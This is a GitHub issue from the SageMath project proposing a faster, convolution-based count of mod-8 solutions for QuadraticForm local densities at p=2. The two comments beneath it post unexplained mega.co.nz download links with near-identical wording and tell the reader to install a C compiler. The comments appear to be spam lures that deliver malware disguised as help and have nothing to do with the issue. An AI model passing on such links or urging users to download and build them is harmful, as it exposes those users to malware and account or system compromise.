### ISSUE TITLE
Improve counting of local solutions for QuadraticForm at p=2

### ISSUE THREAD

**Issue by WvanWoerden** [sagemath/sage#38679]
### Problem Description

Given a QuadraticForm Q it is currently infeasible to compute Q.siegel_product(m) when Q.dim() >= 8. 
The reason for this is that Q.local_density(p,m) for p=2 needs to compute local (good) solutions modulo 8 which is done with a naive brute-force approach by count_congruence_solutions__good_type(2, 3, m, ..., ...).

### Proposed Solution

The solutions mod 8 can be computed efficiently by:
1. put Q in local normal form (which is already done),
2. count all solutions Q_block[v] = k mod 8 per Jordan block for each k=0,...7 (this can be done naively)
3. compute the convolution of the solutions of all blocks
4. return the count at m

Of course this could be implemented in a general way and not just for p=2 or modulo 8.

### Alternatives Considered

None.

### Additional Information

I will propose a pull request with the feature soon.

### Is there an existing issue for this?

- [X] I have searched the existing issues for a bug report that matches the one I want to file, without success.

**Comment by achilles0x** [comment]
maybe this will help
https://mega.co.nz/#!9vE0jIrD!nkSuAAbrT1Sjn01VjaQfVQGAFLqvdIF4EkMeSLuKCWw

you may need to install the c compiler

**Comment by nourakhy** [comment]
I think this will help you.
https://mega.co.nz/#!B31G2LaZ!uBBOCp9hLC7bq9kP8NC6s4DanQJJZuoFRr5FI_jkeic
If you don't have the c compliator, install it.(gcc or clang)
